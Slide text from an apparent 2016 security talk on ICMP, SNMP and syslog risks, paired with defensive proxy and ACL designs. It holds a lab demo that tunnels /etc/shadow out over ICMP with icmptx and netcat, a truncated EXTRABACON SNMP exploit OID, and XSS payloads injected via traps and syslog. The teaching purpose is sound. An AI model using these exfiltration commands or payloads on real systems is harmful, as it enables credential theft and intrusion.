the red headed step children: icmp, snmp and other network ... · what i do icmp snmp snmpv3 syslog...

The Red Headed Step Children: ICMP, SNMP and other network management protocols Download: www.tavve.com/swd

Chuck Craft

Tavve Software

[email protected]

@bubbasnmp

16.09.28

Overview

• ICMP – Discovery/Recon, Covert Channel

• SNMP Polling - EXTRABACON

• SNMP Traps/Syslog – Cross-site Scripting

What I do

ICMP

SNMP

SNMPv3

syslog

TACACS ssh

telnet

RDP NTP

traps

NetFlow

Radius

https

sftp

scp

SIEM

NMS

NPM DMZ

Air gap

Overview




ICMP (Internet Control Message Protocol)

• RFC-792 – “ICMP, uses the basic support of IP as if it were a higher level protocol, however, ICMP is actually an integral part of IP, and must be implemented by every IP module.”

• Internet Protocol Number = 1 (TCP = 6, UDP = 17)

ICMP Header

Echo or Echo Reply Message

0 1 2 3

0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

| Type | Code | Checksum | - used by all ICMP

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

| Identifier | Sequence Number | - varies by TYPE

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

| Data ... - varies by TYPE

+-+-+-+-+-

• Type (8 bits) x Code (8 bits) = 65,536 possible ICMP message formats

• Today talking about Type 8 (echo Request), Type 0 (echo Reply) and Type 11 (Time Exceeded)

• Other often seen messages = Type 3 (Destination Unreachable) and Type 5 (Redirect)

Whitehat ICMP

• Availability (“ping”) – up/down – echo/reply • Latency (Round Trip Time) – RFC-889 • Applications (eHealth, Solarwinds,?) – ping before SNMP polling

• traceroute – path to host • MTU roulette (packet size)

ICMP utilities – ping

• “The Story of the PING Program”

http://ftp.arl.army.mil/~mike/ping.html

*

ICMP utilities – traceroute

• Default is to use UDP. Add “-I” flag to use ICMP ECHO. • Microsoft “tracert” uses ICMP by default. (no option to change protocol) • Uses TTL (Time to Live) field in IP header. Originally seconds. Renamed to Hop Limit in IPv6.

# traceroute -I -n 8.8.8.8

traceroute to 8.8.8.8 (8.8.8.8), 30 hops max, 60 byte packets

1 xxx.xxx.xxx.xxx 1.981 ms 2.943 ms 2.952 ms Type 8 (echo) sent / Type 11 (Time Exceeded) received 2 xxx.xxx.xxx.xxx 3.394 ms 3.404 ms 4.017 ms

3 xxx.xxx.xxx.xxx 89.191 ms 89.221 ms 90.041 ms

4 65.120.10.97 90.049 ms 90.050 ms 90.050 ms

5 205.171.166.33 90.050 ms 117.057 ms 117.088 ms

6 * * * Type 8 (echo) sent / no response received 7 209.85.143.188 112.775 ms 112.504 ms 112.270 ms

8 209.85.143.61 111.980 ms 58.631 ms 58.264 ms

9 209.85.244.209 83.153 ms 82.882 ms 99.668 ms

10 216.239.49.33 81.940 ms 81.332 ms 74.274 ms

11 * * *

12 8.8.8.8 208.090 ms 207.866 ms 205.455 ms Type 8 (echo) sent / Type 0 (echo Reply) received

Blackhat ICMP

How can attacker use ICMP for reconnaissance? - KoonYaw Tan (SANS) 4. Non-Conventional use

– 4.1 Reconnaissance – 4.2 Denial of Service (DoS) – 4.3 Covert Channel (https://www.sans.org/security-resources/idfaq/how-can-attacker-use-icmp-for-reconnaissance/3/13)

Project Loki: ICMP Tunneling (http://phrack.org/issues/49/6.html) ICMP Usage in Scanning (Version 3.0-2001) - Ofir Arkin ICMP based remote OS TCP/IP stack fingerprinting techniques (http://www.phrack.org/archives/issues/57/7.txt)

Unsolicited ICMP (nmap)

# nmap –v –A 192.168.200.50 (HP printer)

Destination Unreachable Message

0 1 2 3

0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

| Type | Code | Checksum |

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

| unused |

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

| Internet Header + 64 bits of Original Data Datagram |

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

OS Fingerprinting (ping data)

Windows 10

Centos 6.7

Covert Channels / Exfil

• (extensible) Data Exfiltration Toolkit (DET) https://github.com/sensepost/DET

• Many ICMP tunnel programs.

https://en.wikipedia.org/wiki/ICMP_tunnel

icmptx – ICMP tunnel

Centos install: (Current status of RepoForge / RPMForge???) # curl -O http://mirror.hmc.edu/repoforge/redhat/el6/en/x86_64/rpmforge/RPMS/icmptx-0.01-2.el6.rf.x86_64.rpm

# rpm -Uvh ./icmptx-0.01-2.el6.rf.x86_64.rpm

ARM/Kali (Debian) install: - download code: https://github.com/jakkarth/icmptx

- icmptx.c: change tunnel ID from 7537 to 7530

/* run_icmp_tunnel(7537, mtu, !strcmp(argv[1],"-s"), argv[2], tun_fd); */

run_icmp_tunnel(7530, mtu, !strcmp(argv[1],"-s"), argv[2], tun_fd);

- build new binary with “make”

0 1 2 3

0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+


+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

| Identifier | Sequence Number | - ID must match on both ends

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

| Data ...

+-+-+-+-+-

***

icmptx – Test setup

xxx.xxx.xxx.233 Centos 6.7 VM # icmptx -c 192.168.200.154

Created tunnel device: tun0

# ifconfig -a | grep -i tun

tun0 Link encap:UNSPEC

HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00

# ifconfig tun0 inet 10.0.3.2 netmask 255.255.255.0

# netstat -nr

Kernel IP routing table Destination Gateway Genmask Flags MSS Window irtt Iface

10.0.3.0 0.0.0.0 255.255.255.0 U 0 0 0 tun0

xxx.xxx.xxx.0 0.0.0.0 255.255.255.0 U 0 0 0 eth0

169.254.0.0 0.0.0.0 255.255.0.0 U 0 0 0 eth0

0.0.0.0 xxx.xxx.xxx.1 0.0.0.0 UG 0 0 0 eth0

# cat /etc/shadow | nc 10.0.3.1 8023

# wc -c /etc/shadow

584 /etc/shadow

xxx.xxx.xxx.154 Pi/ARM/Kali/Debian ~/icmptx/icmptx-0.2# ./icmptx -s 192.168.200.154

# ifconfig -a | grep -i tun

tun0: flags=4240<POINTOPOINT,NOARP,MULTICAST> mtu 1500

# ifconfig tun0 inet 10.0.3.1 netmask 255.255.255.0

# netstat -nr

Kernel IP routing table Destination Gateway Genmask Flags MSS Window irtt Iface

0.0.0.0 xxx.xxx.xxx.1 0.0.0.0 UG 0 0 0 eth0

10.0.3.0 0.0.0.0 255.255.255.0 U 0 0 0 tun0

xxx.xxx.xxx.0 0.0.0.0 255.255.255.0 U 0 0 0 eth0

# nc -l -p 8023

root:$6$MbrMNBHW$kNleGvjhRY6yRM<snip>:16908:0:99999:7:::

bin:*:15980:0:99999:7:::

daemon:*:15980:0:99999:7:::

adm:*:15980:0:99999:7:::

lp:*:15980:0:99999:7:::

sync:*:15980:0:99999:7:::

<snip>

-c = client

-s = server

icmptx – Packet capture

icmptx – data decode

Trust No One – Verify All Received (Stateful FW or ICMP Proxy) Need outstanding

Echo or Echo Reply Message (Type 0)

0 1 2 3

0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+


+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

| Identifier | Sequence Number |

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

| Data ...

+-+-+-+-+-

Time Exceeded Message (Type 11)

0 1 2 3

0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+


+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

| unused |

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+


+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

Destination Unreachable Message (Type 3)

0 1 2 3

0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+


+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

| unused |

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+


+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

ICMP Type 8 with matching ID and Sequence

Outgoing packet matching IP header and Datagram (could be non-ICMP)

Outgoing packet matching IP header and Datagram

Scrub outgoing ICMP data

No data cleanup

Packet recreated. Options to maintain, replace or resize data field.

Normal IP Routing

FW NATs internal

20.20.20.20

20.20.20.20

20.20.20.20

20.20.20.10

ICMP Proxy

20.20.20.15

10.10.10.10

10.10.10.11

10.10.10.12

10.10.10.10

10.10.10.11

10.10.10.12

10.10.10.10

10.10.10.11

10.10.10.12

No data cleanup

Internal Address Hiding

10.10.10.10

Request seen from 10.10.10.10

10.10.10.10


10.10.10.10


Normal IP Routing

FW NATs internal

20.20.20.20

20.20.20.20

20.20.20.20

20.20.20.10

ICMP Proxy

20.20.20.15

Lock down nodes with ACLs

Multiple ACL entries 10.10.10.10 10.10.10.11 10.10.10.12

One or more ACL entries (Static, Dynamic or Overload NAT?)

One ACL entry 20.20.20.15

Normal IP Routing

FW NATs internal

20.20.20.20

20.20.20.20

20.20.20.20

20.20.20.10

ICMP Proxy

20.20.20.15

10.10.10.10

10.10.10.11

10.10.10.12

10.10.10.10

10.10.10.11

10.10.10.12

10.10.10.10

10.10.10.11

10.10.10.12

Overview




@bubbasnmp ???

• http://www.simple-times.org/

• Case, McCloghrie, Rose, Waldbusser et al

• Ask Dr. SNMP – Jeff Case ``That dog won't hunt.''

http://www.simple-times.org/



SNMP Vulnerabilities - 2002

http://www.simple-times.org/pub/simple-times/issues/10-1.html

The Quarterly Newsletter of SNMP Technology, Comment, and Events

Volume 10, Number 1 - December, 2002

The Story Behind the SNMP Vulnerabilities

Tiina Havana, OUSPG / Ari Takanen, OUSPG (University of Oulu - Finland)

“SNMP is an old and mature protocol with numerous vendors providing solutions for it and even more numerous parties providing critical services over it.”

“ SNMP is also a complex protocol using an error prone ASN.1 encoding and containing various error prone data types over an unreliable network environment (UDP). “

“…. it was possible to prove that SNMP implementations were vulnerable and could be exploited if wanted.”








Shadow Brokers - 2016

“The new SNMP flaw, ….” “…. buffer overflow vulnerability”

“While Cisco has said all versions of ASA are affected by the underlying vulnerability in the Simple Network Messaging Protocol, the finding means that ExtraBacon poses a bigger threat than many security experts may have believed.”

EXTRABACON

https://blogs.cisco.com/security/shadow-brokers

“The EXTRABACON exploit targets a buffer overflow vulnerability in the SNMP code of the Cisco ASA, Cisco PIX, and Cisco Firewall Services Module.” “An attacker could exploit this vulnerability by sending crafted SNMP packets to an affected Cisco product.”

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160817-asa-snmp

“The attacker requires knowledge of the configured SNMP community string in SNMP version 1 and SNMP version 2c or a valid username and password for SNMP version 3.”

SNMP Agent / MIB

• SNMP: Simple Network Management Protocol

• MIB: Management Information Base

• Objects in MIB are addressed by OID (Object Identifier)

• SNMPv1, SNMPv2c: cleartext community string

• SNMPv3: more secure - encryption 1, time sensitive, engine IDs

Mgmt Server

SNMP Manager

Managed Node

SNMP Agent

MIB

snmpget

snmpget response Listens on UDP 161

snmpset

asynchronous trap UDP 162

1. https://www.sans.org/reading-room/whitepapers/networkdevs/securing-snmp-net-snmp-snmpv3-1051

SNMP MIB tree / OIDs dot(.)

ccitt(0) iso(1) joint-iso-ccitt(2)

dod(6)

std(0) reg authority(1) member body(2) org(3)

internet(1)

directory(1) mgmt(2) experimental(3) private(4)

mib-2(1)

system(1) interfaces(2) at(3) ip(4) icmp(5) tcp(6) udp(7) egp(8) ….

sysDescr(1) sysObjectID(2) sysUptime(3) sysContact(4) sysLocation(5) ….

iso org dod internet mgmt mib system sysDescr

1 3 6 1 2 1 1 1 .1.3.6.1.2.1.1.1.0 TAVVE ZoneRanger v5.5

SNMP Private Enterprises dot(.)

ccitt(0) iso(1) joint-iso-ccitt(2)

dod(6)

std(0) reg authority(1) member body(2) org(3)

internet(1)

directory(1) mgmt(2) experimental(3) private(4)

enterprises(1)

Reserved(0) NxNetworks(1) IBM(2) CMU(3) ….. Cisco(9) HP(11)

oid = <ASN1_OID['.1.3.6.1.4.1.9.9.491.1.3.3.1.1.5.9.95.184.57.47.5.173.53.165

.165.165.165.131.236.4.137.4.36.137.229

*** output omitted ****

44.144.144.144.144.144.144.141.123.131.9.139.124.36.20.139.7.255.224.144']>

Buffer Overflow

int add_num(char num1, char num2) {

char stuff[100];

char num_total;

stuff[200] = 99;

num_total = num1 + num2;

return num_total;

}

add_num:

@ args = 0, pretend = 0, frame = 112

@ frame_needed = 1, uses_anonymous_args = 0

@ link register save eliminated.

push {r7}

sub sp, sp, #116 Local variables allocated add r7, sp, #0

mov r3, r0

mov r2, r1

strb r3, [r7, #7]

mov r3, r2

strb r3, [r7, #6]

movs r3, #99

strb r3, [r7, #208] Write to La La Land ldrb r2, [r7, #7]

ldrb r3, [r7, #6]

add r3, r3, r2

strb r3, [r7, #111]

ldrb r3, [r7, #111] @ zero_extendqisi2

mov r0, r3

adds r7, r7, #116

mov sp, r7

@ sp needed

ldr r7, [sp], #4

bx lr

Make Your Own Bacon

https://blog.silentsignal.eu/2016/08/25/bake-your-own-extrabacon/

Recreating in lab

• Would a SNMP “View” protect against?

• Are the SNMP packets valid per RFC?

Scrub outgoing SNMP data

No data cleanup

Packet recreated. Verify meets RFC. Filter OIDs.

Normal IP Routing

FW NATs internal

20.20.20.20

20.20.20.20

20.20.20.20

20.20.20.10

SNMP Proxy

20.20.20.15

10.10.10.10

10.10.10.11

10.10.10.12

10.10.10.10

10.10.10.11

10.10.10.12

10.10.10.10

10.10.10.11

10.10.10.12

No data cleanup

SNMPv3 (encryption)

Mgmt. apps must support SNMPv3

Proxy can translate v1, v2c -> SNMPv3

Normal IP Routing

FW NATs internal

20.20.20.20

20.20.20.20

20.20.20.20

20.20.20.10

SNMP Proxy

20.20.20.15

10.10.10.10

10.10.10.11

10.10.10.12

10.10.10.10

10.10.10.11

10.10.10.12

10.10.10.10

10.10.10.11

10.10.10.12

Mgmt. apps must support SNMPv3


10.10.10.10


10.10.10.10


10.10.10.10


Normal IP Routing

FW NATs internal

20.20.20.20

20.20.20.20

20.20.20.20

20.20.20.10

SNMP Proxy

20.20.20.15

Lock down nodes with ACLs

Multiple ACL entries 10.10.10.10 10.10.10.11 10.10.10.12

One or more ACL entries (Static, Dynamic or Overload NAT?)

One ACL entry 20.20.20.15

Normal IP Routing

FW NATs internal

20.20.20.20

20.20.20.20

20.20.20.20

20.20.20.10

SNMP Proxy

20.20.20.15

10.10.10.10

10.10.10.11

10.10.10.12

10.10.10.10

10.10.10.11

10.10.10.12

10.10.10.10

10.10.10.11

10.10.10.12

Overview




SNMP traps

Asynchronous. Unsolicited.

10.10.10.10 UDP Port 162

20.20.20.20 Trap Dest: 10.10.10.10

Syslog

Asynchronous. Unsolicited.

10.10.10.10 UDP Port 514

20.20.20.20 Syslog Dest: 10.10.10.10

Cross-Site Scripting (XSS)

https://www.owasp.org/index.php/Cross-site_Scripting_(XSS) “Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are

injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.”

Examples:

<script>alert("TEST");</script>

<body onload=alert('test1')>

<img src=http://badsite.net/gotya.swf>

<IMG SRC=j&#X41vascript:alert('test2')> (a=&#X41 (UTF-8))

Data Validation

(https://twitter.com/sempf/status/514473420277694465) (https://www.sempf.net/post/On-Testing1.aspx)

Rapid7 Research

Rapid7 Identifier CVE Identifier Class Vendor Patched R7-2016-11.1 CVE-2016-5073 XSS CloudView Version 2.10a R7-2016-11.2 CVE-2016-5073 XSS Cloudview Version 2.10a R7-2016-11.3 CVE-2016-5074 Format String Cloudview Version 2.10a R7-2016-11.4 CVE-2016-5075 XSS Cloudview Version 2.10a R7-2016-11.5 CVE-2016-5076 DOA Cloudview Version 2.10a R7-2016-12 CVE-2016-5077 XSS Netikus Version 3.2.1.44 R7-2016-13 CVE-2016-5078 XSS Paessler Version 16.2.24.4045 R7-2016-14.1 CVE-2016-5642 XSS Opmantek Versions 8.5.12G R7-2016-14.2 CVE-2016-5642 XSS Opmantek Versions 8.5.12G, 4.3.7c R7-2016-14.3 CVE-2016-5642 XSS Opmantek Versions 8.5.12G, 4.3.7c R7-2016-14.4 CVE-2016-6534 Cmd Injection Opmantek Versions 8.5.12G, 4.3.7c

(https://community.rapid7.com/community/infosec/blog/2016/09/07/multiple-disclosures-for-multiple-network-management-systems-part-2)

Deral Heiland, Matthew Kienow – Managed to Mangled: Exploitation of Enterprise Network Management Systems (https://www.derbycon.com/events/managed-to-mangled-exploitation-of-enterprise-network-management-systems/) SNMP Data Harvesting During Penetration Testing - May 4, 2016 (https://community.rapid7.com/community/services/blog/2016/05/05/snmp-data-harvesting-during-penetration-testing)

Simple Network Management Protocol (SNMP) Best Practices - Jan 27, 2016 (https://community.rapid7.com/community/services/blog/2016/01/27/simple-network-management-protocol-snmp-best-practices)

Example string

# ./snmpRequest -p TRAP -v 2c 192.168.200.133/162

"1.3.6.1.2.1.1.3.0={t}0"

"1.3.6.1.6.3.1.1.4.1.0={o}1.3.6.1.4.1.9.0.1"

"1.3.6.1.6.3.1.1.4.1.0={s}\<src=http://181.224.145.117/wp-

content/uploads/2015/11/tavve_logo.gif.gif/\>“

snmpRequest is wrapper for snmp4j.jar

# ./java -jar /root/syslog4j-0.9.46-bin.jar -h 192.168.200.133 udp

"\<src=http://181.224.145.117/wp-

content/uploads/2015/11/tavve_logo.gif.gif/\>"

Good Apps

snmpTrapOID.0=<src=<span class='eventHref'> http://181.224.145.117/wp-content/uploads/2015/11/tavve_logo.gif.gif/>'</span> “<“ “&lt” “>” “&gt”

Bad App

/var/www/html/cgi-bin# cat showlog

#!/bin/sh

echo "<HTML>"

echo "Last 100 lines of /var/log/syslog:<br><pre>"

date

date | sed -e "s/./-/g"

/usr/bin/tail -n 100 /var/log/syslog 2>&1

echo "</BODY></HTML>“

http://xxx.xxx.xxx.xxx/cgi-bin/showlog Last 100 lines of /var/log/syslog:

Sun Sep 25 02:59:06 UTC 2016

---------------------------- Sep 25 01:49:12 kali lighttpd[7303]: Syntax OK

Sep 25 01:49:12 kali systemd[1]: Started Lighttpd Daemon.

Sep 25 01:49:12 kali lighttpd[7311]: 2016-09-25 01:49:12: (plugin.c.183) Cannot load plugin mod_accesslog more than once, please fix your config (lighttpd may not accept such configs in future releases)

Sep 25 01:49:12 kali lighttpd[7311]: 2016-09-25 01:49:12: (plugin.c.183) Cannot load plugin mod_cgi more than once, please fix your config (lighttpd may not accept such configs in future releases)

Sep 25 01:49:12 kali lighttpd[7311]: 2016-09-25 01:49:12: (plugin.c.183) Cannot load plugin mod_status more than once, please fix your config (lighttpd may not accept such configs in future releases)

Sep 25 01:49:44 kali systemd[1]: Stopping Lighttpd Daemon...

Sep 25 01:49:44 kali systemd[1]: Stopped Lighttpd Daemon.

<snip>

http://xxx.xxx.xxx.xxx/cgi-bin/showlog



Bad App Results

<snip>

Sep 25 02:34:03 kali lighttpd[8372]: /usr/bin/tail: cannot open '/var/log/messages' for reading: Permission denied


Sep 25 02:34:58 kali lighttpd[8372]: cat: /var/log/messages: Permission denied

Sep 25 02:35:01 kali CRON[8455]: (root) CMD (command -v debian-sa1 > /dev/null && debian-sa1 1 1)





Sep 25 02:47:27 kali root: chuckc

Sep 25 02:48:57 kali root: \

Sep 25 02:50:22 kali root: \

Sep 25 02:51:06 kali root: \


Filter/fix Incoming traps/syslogs

No data cleanup

UDP=SNMP Traps, Syslog, Netflow Packet recreated. Options to maintain or replace data field. Filter packets.

Normal IP Routing

FW NATs internal

20.20.20.20

20.20.20.20

20.20.20.20

20.20.20.10

UDP Proxy

20.20.20.15

10.10.10.10

10.10.10.11

10.10.10.12

10.10.10.10

10.10.10.11

10.10.10.12

10.10.10.10

10.10.10.11

10.10.10.12

No data cleanup


10.10.10.10

Trap/Syslog Dest : 10.10.10.10

10.10.10.10

Trap/Syslog Dest : 20.20.20.10

10.10.10.10

Trap/Syslog Dest: 20.20.20.15

Normal IP Routing

FW NATs internal

20.20.20.20

20.20.20.20

20.20.20.20

20.20.20.10

UDP Proxy

20.20.20.15

Reduce Destination List

Trap Destinations: 10.10.10.10 10.10.10.11 10.10.10.12

Trap Destinations: 20.20.20.10 20.20.20.11 20.20.20.12

Trap Destination: 20.20.20.15

(proxy does fanout)

Normal IP Routing

FW Static NAT inside

20.20.20.20

20.20.20.20

20.20.20.20

20.20.20.10 20.20.20.11 20.20.20.12

UDP Proxy

20.20.20.15

10.10.10.10 Prod1

10.10.10.11 Prod2

10.10.10.12 Test

10.10.10.10 Prod1

10.10.10.11 Prod2

10.10.10.12 Test

10.10.10.10 Prod1

10.10.10.11 Prod2

10.10.10.12 Test

The Red Headed Step Children: ICMP, SNMP and other network management protocols Download: www.tavve.com/swd

Chuck Craft

Tavve Software

[email protected]

@bubbasnmp

16.09.28

the red headed step children: icmp, snmp and other network ... · what i do icmp snmp snmpv3 syslog...

Documents